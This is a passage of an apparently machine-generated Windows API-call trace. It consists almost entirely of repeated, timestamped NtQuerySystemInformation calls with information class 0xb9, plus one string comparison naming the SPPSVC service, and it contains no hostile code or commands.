NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x50, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.736] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x50, ResultLength=0x0) [0284.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca30, Length=0x28, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x28, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.740] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0284.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb20, Length=0x28, ResultLength=0x0) [0284.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c9c0, Length=0x20, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c940, Length=0x20, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x38, ResultLength=0x0) [0284.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0284.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0284.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1c0, Length=0x20, ResultLength=0x0) [0284.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.750] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0284.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0284.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0284.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0284.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0284.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf40, Length=0x50, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce30, Length=0x50, ResultLength=0x0) [0284.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.770] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb90, Length=0x28, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.774] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.775] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.776] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb60, Length=0x20, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x38, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.777] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb70, Length=0x20, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.778] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0284.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf70, Length=0x28, ResultLength=0x0) [0284.779] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0284.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.779] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0284.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff0, Length=0x50, ResultLength=0x0) [0284.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.780] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0284.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0284.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 